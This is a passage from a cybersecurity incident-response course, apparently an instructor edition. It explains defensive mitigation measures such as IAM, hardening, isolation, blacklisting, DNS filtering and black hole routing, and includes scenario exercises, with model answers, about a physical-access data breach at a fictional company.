• Determine if there are any constraints imposed by management as far as what countermeasures
you're allowed to implement.
up
• Test countermeasures in a non-production environment whenever possible.
Identity and Access Management (IAM)

D
Identity and access management (IAM) is the process of protecting how users and devices are Identity and Access
represented in the organization, as well as how users and devices are granted access to resources Management (IAM)
ot
based on this representation. IAM combines the sometimes distinct functions of identity
management and access control into one comprehensive program. Concepts like authentication and
authorization are also a large part of IAM systems.
N
Typical IAM tasks might include:

• Assigning and changing user access to company resources like specific devices, networks, or data.
o
• Resetting user passwords or other credentials.

D
• Tracking user activities.

• Creating and deprovisioning accounts.
• Synchronizing multiple identities.
• Enforcing identity and access control policies and procedures.
• Designing and maintaining identity systems.
• Evaluating identity-based threats and vulnerabilities.
• Maintaining compliance with government regulations.
Lesson 10: Responding to Cybersecurity Incidents | Topic B

Incident responders can leverage IAM to quickly contain and mitigate attacks that use accounts and
other identity components as vectors. For example, a rogue account can quickly be deprovisioned to
lock an attacker out of a targeted system.
IAM Solutions
There are many IAM solutions. Most IAM services offered through cloud platforms have a similar
set of features, including many of those listed previously. The following are some common
examples.
• AWS Identity and Access Management is part of the Amazon Web Services® cloud platform.
e
• Microsoft Azure Active Directory is part of the Microsoft® Azure® cloud platform.
ut
• Google Cloud Identity and Access Management is part of Google Cloud Platform™.
• IBM Identity and Access Management is part of IBM® Cloud.
ib
• Oracle Identity Cloud Service is part of Oracle® Cloud Platform.
Some IAM solutions that are not specific to the cloud include:
tr
• SolarWinds Access Rights Manager, which enables an organization to manage and audit
access rights in an Active Directory® environment.
is
• The Protected Users group in an Active Directory environment, which disables potential attack
vectors used in authentication for any users assigned to this group. For example, credentials are
not cached locally, so the user must be able to connect to the domain controller in order to sign
D
in. Other potential vectors, like NTLM and long-term Kerberos keys, are also either disabled or
reduced in functionality.
• The group Managed Service Account (gMSA) in an Active Directory environment, which
or
enables the Windows operating system to manage the password of a single security principal
account used by multiple instances of a service, rather than requiring an administrator to manage
the password. This makes it easier for each service instance to synchronize with a single identity,
e
keeping each individual instance opaque to the authenticating user.
at
Patch and Update Management

lic
Patch and Update Patch management, also called update management, ensures the timely and consistent
Management collection, evaluation, testing, and deployment of software fixes. Vendors update operating systems,
applications, device drivers, and firmware on a regular basis to address known vulnerabilities. It is
up
critical to keep your software and hardware updated to take advantage of these improvements.
Attackers may target these vulnerabilities, knowing some organizations may be slow to remediate
them.
Patch management is an essential countermeasure in both the preventative and responsive sense:
D
you patch your critical software to eliminate security vulnerabilities attackers can exploit, while also
patching software to stop an ongoing exploit or recover from the effects of an exploit that's already
concluded. Whether you're updating high-level desktop application software or low-level device
ot
firmware, your management program needs to consider the scope of the changes, including how
many devices or environments require the patch and what kind of downtime, if any, applying the
N
patch will require. You should also identify more attributes about the patches themselves, like where
they come from, how they function, and what vulnerabilities they are meant to fix, so you'll be
better informed.
o
As you update your systems, be sure to also update any policies, procedures, configurations, and
monitoring references (or baselines) that may be affected.
D
Mobile Device Management (MDM)

Mobile Device The practice of mobile device management (MDM) tracks, controls, and secures the
Management (MDM) organization's mobile infrastructure. MDM solutions are often web-based platforms that enable
administrators to work from a centralized console. Common features of MDM solutions include:

• Device enrollment and authentication.

• Remote lock and wipe.
• Locating devices through the Global Positioning System (GPS) and other technologies.
• Pushing out OS, app, and firmware updates to devices.
• Preventing root access or jailbreaking of devices.
• Constructing an encrypted container on devices in which to keep sensitive organization data.
• Restricting certain features and services based on access control policies.
e
ut
ib
tr
is
D
or
e
at
Figure 10-2: An example of an MDM console.
If the organization establishes MDM before an incident, first responders can use the administrative
lic
console in a number of ways to mitigate incidents that affect mobile devices. For example, if a
manager's phone is misplaced or stolen and contains sensitive company information, the CSIRT can
remotely wipe the device from the MDM console. Likewise, the responders will have an easier time
up
locating the device if it's transmitting GPS coordinates. If malware that targets mobile OSs finds its
way onto employees' devices, the CSIRT can quickly push out patches to every device once the
vendor makes the patches available. These are just some examples of how an MDM process can
harden the often-overlooked security of mobile devices during an incident.
D
Physical Security
ot
Physical security is also an important domain for designing and deploying countermeasures. In some Physical Security
organizations, personnel from a Facilities department may be in charge of physical security, distinct
N
from the IT security group; however, more and more organizations are combining physical security
responsibilities and technical and administrative responsibilities under one domain. In doing so, the
CSIRT is kept better informed and has more access to tools and techniques that could help them
o
prevent or mitigate an incident.

D
There are many physical security controls the incident responder might employ or at least be aware This is not an exhaustive
of. Some major examples include: list, and a deeper dive
into physical security is
• Barriers, including fences, walls, doors, and windows. beyond the scope of this
• Locks, including key locks, deadbolts, combination locks, access card locks, and biometric locks. course.
• Storage, including containers, safes, and vaults.
• Surveillance, including security cameras and audio recording equipment.
• Alarms, including lights, bells, sirens, and local or remote console alerts.

• Guards, including human security guards and guard dogs.

• Logs, including visitor logs and employee building access logs.
System Hardening
System Hardening System hardening is the process by which a host or other device is made more secure through the
Consider pointing reduction of that device's attack surface. Hardening is most effective as a preventive measure when
students to https:// designing system security, but this is not always feasible given the constraints of time, money, and
www.cisecurity.org/cis- the need for convenience. However, hardening can be useful after an incident has occurred to shut
e
benchmarks/ for more down any lingering effects or purge a system of an infection. Hardening can also remove and
ut
system hardening best prevent further unauthorized users from accessing compromised systems.
practices.
There are many potential approaches to hardening, each of which may be better served in certain
contexts. The following are some examples:
ib
• Deactivate unnecessary components, including hardware, software, network ports, operating
system processes and services, and applications. When not in use, these components may slip by
tr
your detection, enabling an attacker to stealthily use them as a vector or target of an attack.
• Disable unused user accounts. Accounts like the system's defaults or those of terminated
is
employees are more potential vectors that can go unnoticed.
• Strengthen authentication methods, like enforcing multi-factor authentication and strong
D
password requirements.
• Apply hotfixes and other patches that will enable you to quickly correct system vulnerabilities.
• Restrict host access to peripheral protocols like Universal Serial Bus (USB) and Bluetooth.
or
Attackers with physical access to systems can easily bypass many security measures if they can
simply plug in a USB drive loaded with malware.
• Restrict shell commands per user or per host for least-privilege purposes. Having shell access can
give the attacker a great deal of power over a system, so it's best to reduce its functionality if
e
affected by an incident.
at
Isolation
lic
Isolation One of the most crucial mitigation strategies you can employ for almost all types of incidents is
isolation. Isolation involves removing an affected component from whatever larger environment it is
a part of. This can be everything from removing a server from the network after it has been the
up
target of a DoS attack, to placing an application in a sandbox virtual machine (VM) outside the host
environments it usually runs on.
Whatever the circumstances may be, you'll want to make sure there is no longer an interface
D
between the affected component and the outside world. The most obvious reason has to do with
malware infections, particularly fast-spreading worms and viruses. If a server infected with a worm is
still connected to the rest of its subnet, the worm could easily make its way to other hosts on that
ot
subnet. Disconnecting the server could mean the difference between disinfecting hundreds of
devices and just one. Beyond literally pulling the plug on a server, you can also move it to a new
subnet to logically segment it from the rest of the network. Another method of server isolation is to
N
use a jump box—a hardened host from which authorized personnel access other hosts in a trusted
security zone. If the jump box is truly secure, moving affected systems behind it will help contain
further compromise from attackers.
o
Applications you suspect may be the vector of an attack can be much less effective to the attacker if
D
the application is no longer running on workstations or servers in normal production mode. The
app can be isolated to remove that point of compromise by moving it to a new host or a VM guest
running on that host.

e
ut
ib
tr
is
D
or
Figure 10-3: Isolating a compromised server on a different subnet through network
segmentation.
e
Honeypot
at
A honeypot is a practice that traps attackers in an isolated environment where they can be
monitored and kept from compromising systems in production. The honeypot tricks the attacker
into believing they are causing actual damage to a system, which enables the security team to analyze
lic
the attacker's behavior. This can help the security team identify the source of the attack, and take
more comprehensive steps to completely eradicate the threat from the organization. For example, an
organization constructs a database full of benign or meaningless data disguised as important
up
financial records. The organization places the database behind a subnet with lowered defenses,
which baits an attacker into attempting to exfiltrate this useless data.
Bastion Host
D
A bastion host is an alternative to a jump box that segments and isolates network resources for the Bastion Host
ot
purposes of securing access. Whereas a jump box is a hardened server within the security zone the
user is trying to access, essentially making it a bridge between two separate security zones, a bastion
host connects a trusted zone to a trusted zone or an untrusted zone to a trusted zone. It does not
N
enable direct access to a trusted zone, but it does provision resources and services from within the
trusted zone to external users or devices.
The bastion host is therefore a single point of attack from which users from untrusted networks like
o
the Internet can access resources and services that need to be kept isolated and secure. The
organization can more easily protect, maintain, and monitor this system they expect to be attacked.
D
Bastion hosts are usually firewalls, DNS servers, email servers, web servers, or any other type of
server that faces a public network. These hosts provide specific services to users.
Consider the following analogy: A jump box is like a guard for your main office building. When
someone from a branch office visits, they must be granted access by the guard before they can enter.
Once inside, the visitor has access to the building, though not necessarily total access if other
security controls are in place. Now, consider that a bastion host is like a bank teller. A customer

wants to withdraw money from the bank. The teller provides this service for the customer, and the
customer is never granted access to the bank vault itself.
e
ut
ib
Figure 10-4: A bastion host sits outside the internal network and can provision resources to
users making requests from external networks like the Internet.
tr
Blacklisting
is
Blacklisting Blacklisting is the process of blocking known applications, services, traffic, and other transmissions
to and from your systems. Blacklists, also called block lists, are created when the organization knows
D
the source or mechanism of a potential threat and determines this threat can be shut out from the
organization entirely.
Blacklists are useful in incident response for their ability to block the source of malware. The source
or
can be external to the organization, or it can be positioned internally through persistence techniques
like rootkits and logic bombs. As an example of an external source, consider that the users in your
organization are having their workstations infected by malvertisement on seemingly legitimate
e
websites. The advertisements are not necessarily localized to one site, so it may not be effective to
simply prevent users from visiting one particular site. Instead, you can implement ad blocking or
at
script blocking software on the user's workstations, or adjust your organization's web filter to block
URL requests for known advertisement domains. Constructing a blacklist of domains, sites, or
technologies that can be a vessel for malware will help stop an infection from spreading.
lic
As an example of an internal source of malware, assume that you've uncovered evidence of logic
bombs going off under unknown circumstances. You do know the effect (encrypting the user's drive
to use as ransom), and you know how it spreads—through several different TCP/IP ports. So, your
up
blacklist could include the port numbers you know the logic bomb uses to spread, and if you
implement the blacklist at the firewall, you can help prevent more hosts from being infected.
D
Limitations
There are two main limitations of blacklists. The first runs the risk of false positives, in which you
block a site, service, port, and so on, that actually has legitimate uses. This can end up being a sort of
ot
collateral damage in an attempt to defend against a malware attack with many vectors or vectors
commonly used in normal operations. The other main weakness of blacklisting is everything that
you don't know. You can't possibly know every single malicious attack vector out there, and the
N
ones on the list might not be comprehensive enough. You're essentially running the blacklist from a
limited perspective, one that can't possibly catch up to the ever-changing world of malware and
other threats.
o
D
Whitelisting
Whitelisting Whitelisting is a response to the blacklist's problem of what you don't know. In a whitelist, also
called an allow list, you block everything except what you trust. In the external malvertisement
example, you could create a list of advertisement domains you know to be legitimate, and filter out
the rest. It's much easier to account for what you know is safe or acceptable.

In response to an ongoing incident, whitelisting may be the better alternative when confirming and
researching malicious sources of malware that are either too time consuming or too subject to
change. You're much more likely to know right away what's friendly than to spend time identifying
every possible foe. You may have missed a port that the logic bomb uses to communicate, and that
your blacklist doesn't account for. That will enable the infection to spread, despite your efforts. If
you enforce a whitelist of all legitimate ports, however, then this unknown port would likely have
been blocked.
Whitelisting is also useful in keeping a list of applications that a host can install, or a network
address it can communicate with. If a user's workstation needs only a word processor, a spreadsheet
e
program, and not much else, then all other software (including malicious software) can default to
ut
being blocked while the CSIRT contains and mitigates the incident.
Limitations
ib
Whitelists are usually a safer bet in incident mitigation, but they're not flawless. They can be
incredibly restrictive, preventing users and systems from transmitting data to new or changing
tr
recipients. They need to be constantly fine tuned to avoid interference with business operations,
which can be cost prohibitive and time prohibitive for some organizations.
is
Note: To summarize, whitelisting is preferred as the default preventative tactic, whereas
blacklisting is best used as a reactive tactic when you know the specific sources of an incident.
D
DNS Filtering
or
As you've seen, one of the mechanisms involved in blacklisting and whitelisting is filtering. Domain
Name System (DNS) filtering, also called web filtering, is the process of restricting what kind of
lookup requests are validated within an organization. The typical DNS process translates a common
DNS Filtering
e
site name into an IP address and returns it to the user making the request. If you place a filter on
your DNS, however, the DNS lookup can be halted if it detects a name/IP address on its filter
at
(blacklist) or not on its filter (whitelist). Instead of returning the untrusted site to the user, the filter
will usually redirect them to a local server with a block message.
lic
up
D
ot
N
o
D

e
ut
ib
tr
is
D
or
e
Figure 10-5: A DNS filter has blocked a user from viewing an untrusted site.
at
During an incident, a DNS filter can help prevent users from downloading more malware onto their
systems and increasing the incident's magnitude. Filtering at the DNS level is easy to apply
organization wide and can save you from scrambling to each and every workstation to apply your
lic
mitigation locally. It won't remove an infection or mitigate other types of incidents, but it's an
effective method of malware containment nonetheless. However, it's important to note that, if users
don't actually use your DNS servers for lookup, they may be able to bypass filtering.
up
Black Hole Routing

D
Black Hole Routing In network architecture, a black hole drops traffic before it reaches its intended destination, and
without alerting the source of this. A simple example is traffic that is sent to an IP address that has
been mapped to a non-existent host. Since the destination does not exist (the figurative black hole),
ot
the inbound traffic is discarded. In order for the source not to be alerted about the discarded traffic,
it must transmit the traffic using a connectionless and unreliable protocol like User Datagram
Protocol (UDP), rather than a protocol like Transmission Control Protocol (TCP) that attempts to
N
verify delivery.
Like DNS filtering, you can use black holes in conjunction with blacklists/whitelists to filter out
o
unwanted traffic sources that may contain malware. However, a more common and effective way to
use black holes is by dropping packets at the routing layer to stop a DDoS attack. Using a Cisco
D
router, for example, traffic can be sent to the null0 interface. This interface automatically drops all
traffic. If you know the source address range(s) of a DDoS attack, you can silently drop that traffic
by configuring the router to send the attacking range(s) to null0.
Black hole routing may be more beneficial than other methods of traffic filtering because it tends to
consume fewer router resources. Processing overhead for implementing firewall rules or DNS
filtering is much higher, and when you're trying to mitigate a DDoS attack, every bit of bandwidth
helps. It's extremely important, however, for you to recognize the high potential for collateral

damage in routing entire IP address ranges into black holes. The most successful DDoS attacks
launch from disparate IP addresses—addresses that are in ranges shared with many legitimate users.
Blocking an entire range to stop just a handful of sources may, ironically, end up denying your
services even more.
e
ut
ib
tr
is
D
or
e
at
lic
Figure 10-6: Black hole routing dropping malicious traffic.

up
Secure Erasure and Disposal

In some cases, hardening a host or isolating it from other devices won't be enough to completely
D
Secure Erasure and

eradicate a malware infection or another point of compromise. It's often extremely difficult to verify Disposal
that your non-destructive removal techniques have truly scrubbed rootkits and other persistence
ot
mechanisms from a device. Situations like these may call for secure erasure through a process
known as sanitization. Sanitization is the act of thoroughly and completely removing all data on a
storage device so it cannot be recovered. This thoroughness is essential, as there should be no data
N
remnants that persist on the device that could lead to continued compromise.
You can sanitize a drive at the software level using various forensic applications, or you can connect
a forensic hardware device to bypass the operating system. In either case, sanitization tools typically
o
overwrite all data on a drive with random or all zero bits. This prevents other tools from extracting
and reconstructing meaningful data from the drive, as this data has been replaced by entirely
D
meaningless information. You can also sanitize a drive through degaussing, in which a strong
magnetic force is applied so the drive loses its magnetic charge, scrambling the data and rendering it
unreadable.
Note: On modern drives, degaussing may be destructive to the drive itself.

Degaussing works only on media that store data magnetically, like hard disk drives. Solid-state drives
(SSDs) cannot be degaussed. You also cannot reliably write zeros to an SSD and expect it to erase
the data; this is because, unlike hard drives, SSDs do not simply overwrite old data with new data.
Instead, SSDs mark a page on the drive as invalid so the operating system knows not to access it;
the data on the page remains until the SSD determines it needs more space and erases the data on
the page. Some SSD manufacturers provide firmware utilities for securely erasing data on SSDs, but
those utilities tend to only work on devices from that manufacturer.
True sanitization is destructive to the virtual data, not the storage medium itself. This enables you to
reconstruct and reimage the drive after it is sanitized, using a known clean backup you created prior
e
to the incident. However, in some cases, you may not be confident that an infection has been
ut
eradicated until the storage medium itself is destroyed. Disposing of this compromised hardware
typically involves physically destroying the device through force, such as through crushing the drive
or shredding it into many pieces. Degaussing techniques can also destroy a drive by removing servo
ib
control data that is written to the drive when it is manufactured. Corrupted servo control data
cannot be fixed and will make it impossible for the drive to determine where to read/write data on
the magnetic media.
tr
Sanitization Through Encryption
is
One alternative to employing direct secure erasure methods is to encrypt the drive using full drive
encryption (FDE). As long as the drive undergoes FDE before any sensitive data is put on it, and
D
you destroy the encryption key, then you will be able to safely reuse the drive without being able to
access the original plaintext data. Microsoft's BitLocker® is a common example of an FDE solution.
or
Devices and Tools Used in Prevention, Containment, and
Mitigation
e
Devices and Tools Used You should be familiar with the devices and tools in the following table, but you should also
in Prevention, consider how they can be used to help you address cybersecurity incidents in addition to their
at
Containment, and normal functions.

Mitigation
lic
Device/Tool How They Can Be Used to Help Prevent/Contain/Mitigate Incidents
Firewalls Firewalls can perform some of the most rudimentary traffic filtering
processes on your network. They can use both whitelists and blacklists to
up
block certain ports you've identified as vectors for a current attack. More
advanced firewalls, like web application firewalls (WAFs), can block
unwanted traffic at higher layers, offering you greater control over what
type of traffic you intend to block.
D
IDS/IPS An intrusion detection system/intrusion prevention system (IDS/IPS)

will help ensure that sustained or persistent attacks are easier to identify
ot
and characterize. Even though you may already know you're under attack,
an IDS/IPS can reveal additional targets of the attack that you may have
originally ignored. It can also help you detect and stop an attack whose
N
nature evolves throughout the duration of the attack. An ongoing DDoS

attack may switch from using one source botnet controller to using
another one, for instance.
o
D

Device/Tool How They Can Be Used to Help Prevent/Contain/Mitigate Incidents

Endpoint solutions Endpoint security solutions incorporating robust anti-malware
functionality can help you discover and eliminate rootkits, backdoors, and
other signs of an advanced persistent threat (APT). They can also help
you discover and eliminate worms that spread throughout a network, as
well as many other types of malware that might be part of an incident.
Endpoint solutions that incorporate data loss prevention (DLP) can help
you minimize the leakage of confidential data from backdoors, side
e
channels, or other holes in your security that attackers exploit in an
incident.
ut
Routers and switches As previously discussed, routers can be useful in creating black holes for
DoS traffic to be discarded. Many modern routers also have basic firewall
ib
functionality, meaning they can block unwanted traffic communicating
over certain ports and protocols. Switches are also a common component
for establishing subnets. These subnets can isolate compromised devices
tr
while still affording them a network connection.
Proxies Web proxy servers can be used as a method of content filtering. A user
is
must pass through the proxy to connect outside of the private network,
and the proxy can block the user from being exposed to malicious traffic.
D
On the other hand, reverse proxies can respond as an intermediary for
the server that the attacker is contacting. The actual server stays hidden,
while the reverse proxy server takes on any inbound malicious traffic.
Virtual machines
or
When it comes to mitigating a malware infection, you can isolate and
analyze the malware in a virtual environment. In addition, a server
infrastructure spread among many distributed VMs, as in a cloud
e
architecture, may be able to more efficiently handle excessive traffic load
and minimize downtime in a DoS attack.
at
Desktops Desktops are the platform from which you'll use the incident response
tools of the trade. Desktops may also temporarily host VM environments
lic
used in malware analysis and offensive/responsive security tasks (such as

through Kali Linux™). Indirectly, desktops are often a major source of
incident intelligence because of how essential they are to the daily work of
up
your employees.
Servers Server infrastructure provides load balancing and data backups during
DDoS attacks and data destruction breaches. Servers are also commonly
D
used to offload raw processing power in the event of some resource-

intensive recovery or mitigation effort. Like desktops, servers are a major
attack target, and can provide you with a great deal of actionable
ot
intelligence.
Mobile devices The portability of smartphones, tablets, and other mobile devices may
speed up your mitigation efforts, as they are not tied to one physical
N
location like a desktop. Some rudimentary security tools are available for
mobile OSs, so you can quickly move from one affected device to
o
another without great effort. Communicating with other CSIRT members

is also much more convenient with mobile devices.
D
Additional Mitigation Tactics

Some additional tactics to employ when mitigating the effects of an incident include: Additional Mitigation
• Manage and restrict access to resources and behaviors for hosts in a Windows domain through Tactics
group policies. Group policies define how members of an organizational group (e.g., a

department) are able to interface with computing and network resources within the organization.
This usually takes the form of Active Directory Group Policy Objects (GPOs), which enable an
administrator to restrict user access in an Active Directory domain to a granular level. You can
also apply these policies to objects like Registry entries and file systems. This may help you
contain an attack that uses these objects to assume higher levels of privilege.
• Implement network access control (NAC) policies. You can restrict how hosts access
resources and services over the network—including quarantining hosts in separate virtual local
area networks (VLANs) or implementing switch port blocking entirely—based on several
factors, including:
e
• Time-based factors to keep an entity from accessing network resources based on the time of
ut
day. For example, a resource may be accessible only during business hours so that any
necessary response is more readily available.
• Location-based factors to keep an entity from accessing network resources based on where
ib
they are physically located. For example, you may not allow GPS-enabled mobile devices to
access the network if they are beyond your office's perimeter.
tr
• Other rule-based factors to keep an entity from accessing network resources if they do meet
the predefined standards. For example, you may disallow entities using a particular operating
system from accessing network resources.
is
• Role-based factors to delegate access based on the entity's function and responsibilities. For
example, you may allow access to a resource only if the requesting entity is in the
D
administrator role.
• Set up a sinkhole to reroute malicious outbound traffic from your network. Your access control
lists (ACLs), whether blacklisting or whitelisting, can identify potentially malicious external
or
domains. If a bot inside your network is attempting to contact its controller on the outside, and
this malicious domain matches your ACL rules, you can set up your perimeter firewall to forge a
DNS response to the bot that connects the domain to an IP address you specify. This is the
sinkhole, as the malicious botnet traffic cannot escape to the outside world.
e
• Establish a centralized system for managing logs. Keeping log generation and collection localized
at
to individual hosts will make it easier for an attacker to wipe the logs of a host to cover their
tracks. With a centralized system, logs will be offloaded and backed up onto a secure server that
may be outside the attacker's grasp.
lic
• Configure IDS/IPS rules to take on a more active containment role, rather than just a preventive
one. Once you've identified the vectors and mechanisms of an attack, alter your rules to trigger
alerts based on behavior that may indicate ongoing or persistent malicious behavior. You can
up
also adjust your rules to account for the possibility of an attacker varying their attack to
circumvent your detection systems. If your rules incorporate known variations on attack types,
you may be able to spot additional malicious behavior you would have otherwise missed.
D
• When necessary, implement compensating controls when typical mitigation efforts have failed.
Guidelines for Mitigating Incidents

ot
Guidelines for Mitigating Follow these guidelines when mitigating incidents.

Incidents
N
Mitigate Incidents
When mitigating incidents:
o
• Leverage IAM functionality when addressing identity-based threats.

D
• Incorporate a patch management system to quickly update vulnerable hosts.

• Use an MDM solution to exercise greater control over mobile devices in the organization.
• Identify physical security controls and how they may be useful in mitigating incidents.
• Harden affected systems by disabling unnecessary accounts, services, and access.
• Remove affected hosts from the wider network.
• Isolate affected apps on guest VMs.

• Incorporate blacklisting and whitelisting to control what sources of malware and traffic are
blocked in your organization.
• Use DNS filtering to prevent users from accessing malicious sites.
• Incorporate black hole routing to drop malicious traffic sent to the network.
• Understand how the everyday devices in your organization can help you mitigate an incident.
• Implement access control mechanisms like NAC policies, group policies, and ACLs.
• Have a plan to implement compensating controls when typical mitigation efforts fail.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 10-2
Identifying and Analyzing an Incident
Scenario
e
Now that you've collected preliminary information about the incident and drafted a plan of action,
it's time to respond. As a lead responder in Develetech's CSIRT, you've been asked to acquire more
ut
data related to the incident and analyzing that data.
Activity: Identifying and
ib
Analyzing an Incident
Use the slide to 1. You've already collected the logs on the affected research and development
summarize the incident
server.
tr
for students. This will
help them keep the
What else should you and your team collect that will help you understand
is
details fresh in their
minds. what happened?
Remind students that A: Answers will vary. The team will need to collect any network logs that list remote access events.
D
they can consult NIST The team discovered the remote IP address (67.240.182.117), but any additional information, like
SP 800-61 if they need the number of connection attempts, or any past activity by this IP address, will be valuable. On a
ideas during this activity. network level, the team should also identify any intrusion detection/prevention activity that
or
generates alerts. If the affected server has any anti-malware or HIDS/HIPS running, the team
should also consider any alerts from these as incident-related data. The team can also consult its
SIEM solution to see if any anomalous activity was detected in its log analysis duties. At this point,
the team doesn't know what, if anything, was done to the server or network. All of these tool-
e
assisted records can help them piece together the extent of the damage. Beyond technical
sources of data, others in the team should also start interviewing all relevant employees. Charles
at
needs to describe every step that he took when he tried signing in to his account, as well as who
he contacted to get that resolved, and when. The help desk employee needs to corroborate this
information. Likewise, you should confiscate Pat's workstation. It may be helpful to try contacting
lic
Pat as well and explaining the situation. Any surveillance camera footage around the time of Pat's
computer accessing the server should also be gathered. What's more, you should determine if
anyone else was in the building before 8:00 a.m. and witnessed any unusual behavior, especially
up
around Pat's desk.
2. Your network logs show no history of the 67.240.182.117 IP address remotely

connecting to any server within your Windows Active Directory domain. The
D
IP address only attempted to connect once to the research and development

server.
ot
What, if anything, does this tell you about a potential incident?

A: Unfortunately, not much. A fact of incident analysis is that not every indicator or source of
N
information will be relevant or even accurate. This could indicate that someone specifically used
this IP address because they knew it had no history that could be traced back to them; or, it might
simply mean that it was the user's first time ever accessing a remote computer in the domain from
o
that IP address.
D

3. Network access logs show that the remote connection tried to log in under
Charles' account five times. The server's event logs also confirm this. After
the fifth failed attempt, the domain's account lockout policy took effect, and
Charles' account was denied access until reset by an administrator. However,
Charles denies that he tried to log in last night.
What does this suggest happened?
A: It suggests, but does not prove, that the user was simply guessing the password to Charles'
e
account. After too many failed guesses, security measures kicked in and locked the account.
Because Charles denies he tried to log in last night, it seems unlikely that Charles himself forgot
ut
his password or mistyped it over and over again. Thus, the team can reasonably conclude that
someone attempted to use Charles' account as a way to log in to the research and development
server remotely.
ib
4. The team members ask how someone could have discovered Pat's
password. Because remembering passwords is difficult, Pat admits to writing
tr
several passwords on a piece of paper and placing it in the top drawer of the
is
desk.
What does this suggest about the role of Pat's account and workstation in the
D
incident?
A: It suggests the attacker merely found the password Pat wrote down and put in the drawer, and
5.
then used that to log in to the account at Pat's workstation.
Now, the CSIRT must ascertain what damage, if any, has occurred.
or
e
What practices should the team put in place for this important phase of the
response?
at
A: Answers will vary. The team should have a baseline already in place for normal behavior on both a
network level and on the affected host. This will make detecting a deviation from the norm much
lic
easier. The team has already done some log correlations, but it also needs to go further and make
sure that it knows exactly what happened on the network and the host at specific times. A SIEM
solution can assist the team in doing this, if available. The team can also make their jobs easier by
up
filtering out irrelevant data they've collected, which often becomes apparent during the analysis
phase. Any alerts generated by IDSs at key times may also confirm the nature of a possible
attack, especially if any reconnaissance was done prior to the incident.
D
6. While analyzing collected data, a responder noted that nearly two minutes
after Pat's account was logged in to the research and development server
(7:45 a.m.), event logs show a removable storage device being attached to
ot
the workstation. The next related event was when the device was safely
ejected, at 7:50 a.m.
N
What might this suggest?

A: It could suggest that the person who logged in to Pat's workstation attempted to remove data from
o
that workstation. It could also suggest that the person loaded something onto the server.
D

7. The research and development server was set up with an HIDS prior to the
incident. The HIDS generated an alert at 7:44 a.m indicating that several files
were copied to a host on the network, including highly confidential images
and documents related to Develetech's upcoming line of smartwatches. The
connection was terminated at 7:45 a.m. There is no immediate trace of the
files on the client destination.
What does this suggest?
e
A: It suggests that a sensitive document was quickly exfiltrated from the research and development
server and moved to a different host—most likely Pat's workstation—as it was the only account
ut
signed in at the time. The document was then deleted from Pat's workstation.
Consider everything that you've discovered thus far.
ib
8.
What do you believe has happened?
tr
A: Answers may vary, but essentially, you might say something along these lines: An attacker
attempted to use Charles' account to connect remotely to the internal research and development
is
server. The attacker failed. Later, in the early morning before most people made it in to the office,
the attacker physically went to Pat's desk, discovered the password written down in a drawer, and
used it to log in to the workstation and the remote server. While in the remote server, the attacker
D
transferred sensitive product files to Pat's workstation, where the attacker then copied the file to a
removable drive. The attacker deleted the file from Pat's workstation, ejected the removable drive,
and left. The organization's data has been breached.
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 10-3
Containing, Mitigating, and Recovering from an
Incident
e
Scenario
ut
Now that you've identified the basics of the incident, you must contain it to stop it from bringing
any more harm to your organization. You'll also need to wipe any potential lasting traces of the
breach from your systems to ensure the issue is resolved. The next step will be to recover the
ib
business functions that were affected by the breach so that the organization can truly return to
normal. Lastly, the CSIRT needs to conduct the post-incident task of drafting an AAR so as to help
tr
prevent such an incident from occurring in the future.
Activity: Containing,
is
Mitigating, and
1. What are some containment and mitigation strategies you'd perform on this Recovering from an
Incident
D
incident to stop a data breach from continuing or reoccurring? Use the slide to
A: Answers will vary. Some devices, like Pat's workstation and the research and development server, summarize the incident
have been collected for analysis. They should stay disconnected and isolated from the wider for students. This will
or
network in case the attacker has a backdoor communication channel into these devices. When the
CSIRT is ready, they should also perform malware scans on the isolated systems to determine if
any filtering needs to be applied to the wider network. If the attack was assisted by malware, the
team needs to block the source of that malware using whatever method they deem to be
help them keep the
details fresh in their
minds.
Consider asking
e
appropriate. Both Charles and Pat should have their domain accounts disabled for now, so the students if they think this
attacker cannot continue to use them as vectors. Network access to other servers that hold incident could result in a
at
sensitive information should also be actively monitored or completely denied, depending on how criminal prosecution,
significantly this will impact business needs. and whether they think it
will require forensic
lic
2. What likely cannot be contained by the CSIRT team as a result of this investigation.
breach?
up
A: If the attacker was able to exfiltrate data onto a USB drive and leave the building with it, they could
have distributed it in any number of ways. If the design document falls into the hands of a
competitor or is uploaded to the public Internet, it will be very difficult, if not impossible, to fully
contain the breach.
D
3. A thorough scan did not detect any malware on the affected systems. The
team has concluded that the systems are free of rootkits, keyloggers, and
ot
other malicious software that would help the breach persist.

How would you recover the functionality that the research and development
N
server provided, such as serving documents about upcoming Develetech

products, as well as the functionality of Pat's workstation?
o
A: Answers will vary. Some may argue that, because the systems are both clean of malware, and the
only point of compromise at the moment is user accounts that have been disabled, it is safe to
D
push both computers back into production. However, without the full picture of the incident, it
would be premature to say there couldn't be other points of compromise that the team doesn't yet
know about. Likewise, both devices may need to be treated as evidence in an upcoming
investigation, so pushing them back out rather than keeping them quarantined would hurt that
investigation. Instead, it would be best to recover the latest backup copy of the research and
development server, put that backup image on a different machine, and use that as the live
production environment for now. The IT department can provision a temporary workstation for Pat
while the normal one is quarantined.

4. When it comes to Charles' and Pat's disabled user accounts, how will you
approach recovery?
A: Answers will vary. The team may decide to restore Charles' account immediately, as it appears the
attacker only knew his user name, and not his password. His user name is likely common
knowledge in the company or easily guessable anyway. Therefore, anyone with access to the
research and development server could have been a target without having done anything
necessarily wrong. On the other hand, Pat's account is compromised and it needs a password
change before it can be re-enabled. However, even before that, it would be a good idea to ensure
that Pat is trained on proper end-user security practices, and should be reacquainted with the
e
company-specific policy regarding passwords and password storage. The human factor is one of
the weakest points in the security of any organization, and writing passwords down and putting
ut
them in an unlocked drawer is certainly not an acceptable practice. Until Pat has demonstrated a
willingness to comply with security policies and guidelines, the account should stay disabled.
ib
5. The situation appears to have been mitigated, and normal business
operations have been restored. A new physical machine is hosting a recent
tr
backup of the research and development server, Charles' account has been
re-enabled, and Pat will be provisioned a new workstation and required to
is
undergo security training upon returning from vacation. Now the team must
draft an AAR.
D
What lessons have you learned from this incident, what suggestions do you
have so that an incident like this is prevented in the future, and what other
content should be in the report?
or
A: Answers will vary. The AAR should clearly outline what actions the CSIRT took in its incident
handling procedures. This includes every step, from identification and analysis, to containment
e
and eradication, and then to recovery. The report should justify the actions the team took, and, if
applicable, should admit if there were more efficient and accurate ways of handling the incident.
at
Finally, the team needs to ask itself what should change as a result of this incident. The
